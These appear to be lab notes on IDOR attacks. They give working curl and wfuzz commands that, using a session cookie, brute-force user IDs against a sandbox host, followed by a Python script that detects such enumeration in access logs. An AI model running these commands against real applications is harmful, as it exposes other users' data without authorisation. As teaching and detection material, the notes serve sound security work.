Tips:

  1. Static file IDOR is something like changing 1.txt to 2.txt. Route-based IDOR can also be considered, but it needs some guesswork.
  2. Database object reference (ID-based) IDOR refers to identifiers such as 1 to 2, or more complicated ones like 1a2eee3d-01-44mc11.

Use curl and wfuzz to brute-force the ID:

  1. First use curl, with the authenticated cookie, to obtain the response length for an invalid ID as a baseline (-s silences the progress meter, -o /dev/null discards the body, -w '%{size_download}' prints the response size):
    curl -s -o /dev/null http://idor-sandbox:80/user/?uid=91191 -w '%{size_download}' --header "Cookie: PHPSESSID=2a19139a5af3b1e99dd277cfee87bd64"

  2. Once you have that invalid-ID response size, hide it (--hh) together with 404 responses (--hc) in wfuzz:
    wfuzz -c -z file,/usr/share/seclists/Fuzzing/5-digits-00000-99999.txt --hc 404 --hh 2873 -H "Cookie: PHPSESSID=2a19139a5af3b1e99dd277cfee87bd64" http://idor-sandbox:80/user/?uid=FUZZ
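The enumeration above leaves a recognisable trace on the server: one session hitting /user/?uid= with many distinct values and receiving mostly identically sized "invalid ID" pages. As an added example that is not part of the original notes, this Python script flags that pattern over a few constructed access-log lines; the log format, the thresholds and the second session ID are assumptions.

```python
import re
from collections import defaultdict

# Constructed access-log sample (format is an assumption): combined-log fields
# plus the request's PHPSESSID. Session 2a19... walks uid values; 7f3c... is a normal user.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /user/?uid=00001 HTTP/1.1" 200 2873 "PHPSESSID=2a19139a5af3b1e99dd277cfee87bd64"
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /user/?uid=00002 HTTP/1.1" 200 2873 "PHPSESSID=2a19139a5af3b1e99dd277cfee87bd64"
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /user/?uid=00003 HTTP/1.1" 200 2873 "PHPSESSID=2a19139a5af3b1e99dd277cfee87bd64"
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /user/?uid=00042 HTTP/1.1" 200 4101 "PHPSESSID=2a19139a5af3b1e99dd277cfee87bd64"
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /user/?uid=00043 HTTP/1.1" 200 2873 "PHPSESSID=2a19139a5af3b1e99dd277cfee87bd64"
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /user/?uid=00044 HTTP/1.1" 200 2873 "PHPSESSID=2a19139a5af3b1e99dd277cfee87bd64"
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /user/?uid=00042 HTTP/1.1" 200 4101 "PHPSESSID=7f3c0d9e2b1a4c5d6e7f8091a2b3c4d5"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+) \S+" '
                    r'(?P<status>\d{3}) (?P<size>\d+) "PHPSESSID=(?P<sid>[0-9a-f]+)"$')
UID_RE = re.compile(r'[?&]uid=([^&]+)')

def parse_line(line):
    """Return (sid, uid, status, size), or None for lines without a uid parameter."""
    m = LOG_RE.match(line)
    uid = UID_RE.search(m.group("path")) if m else None
    if not uid:
        return None
    return m.group("sid"), uid.group(1), int(m.group("status")), int(m.group("size"))

def find_enumerators(lines, min_uids=5, same_size_ratio=0.8):
    """Flag sessions that request many distinct uids and get mostly identically sized 200
    responses (the "no such user" baseline); the odd-sized ones are the records worth reviewing."""
    per_sid = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec[2] == 200:
            per_sid[rec[0]].append(rec)
    flagged = {}
    for sid, recs in per_sid.items():
        uids = {uid for _, uid, _, _ in recs}
        if len(uids) < min_uids:
            continue
        sizes = [size for *_, size in recs]
        baseline = max(set(sizes), key=sizes.count)   # most common size = invalid-ID page
        if sizes.count(baseline) / len(sizes) >= same_size_ratio:
            nonbaseline = sorted({uid for _, uid, _, size in recs if size != baseline})
            flagged[sid] = {"distinct_uids": len(uids), "baseline_size": baseline, "nonbaseline_uids": nonbaseline}
    return flagged
```

In production the thresholds should be tuned per endpoint, and the baseline size can drift when the error page embeds dynamic content, so comparing a rounded size or a body hash is more robust.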